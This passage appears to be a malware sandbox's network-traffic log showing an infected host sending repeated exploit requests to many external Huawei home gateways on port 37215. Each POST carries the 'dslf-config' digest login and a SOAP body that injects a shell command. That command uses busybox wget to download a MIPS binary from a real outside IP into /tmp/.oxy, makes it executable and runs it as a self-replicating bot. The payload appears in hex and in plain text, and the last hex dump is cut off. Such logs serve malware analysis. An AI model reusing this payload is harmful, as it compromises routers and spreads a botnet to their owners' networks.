                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  550192.168.2.1347458125.122.99.12337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321155071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  551192.168.2.134306641.218.220.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321170092 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  552192.168.2.1338008124.152.167.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321190119 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  553192.168.2.1348900197.203.19.8337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321206093 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  554192.168.2.1344256197.240.184.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321224928 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  555192.168.2.135578241.3.40.17837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321244955 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  556192.168.2.1349362157.166.4.15137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321265936 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  557192.168.2.1332956195.183.122.10937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321284056 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  558192.168.2.1359426197.70.140.17237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321333885 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  559192.168.2.1335454189.167.69.11837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.321346998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 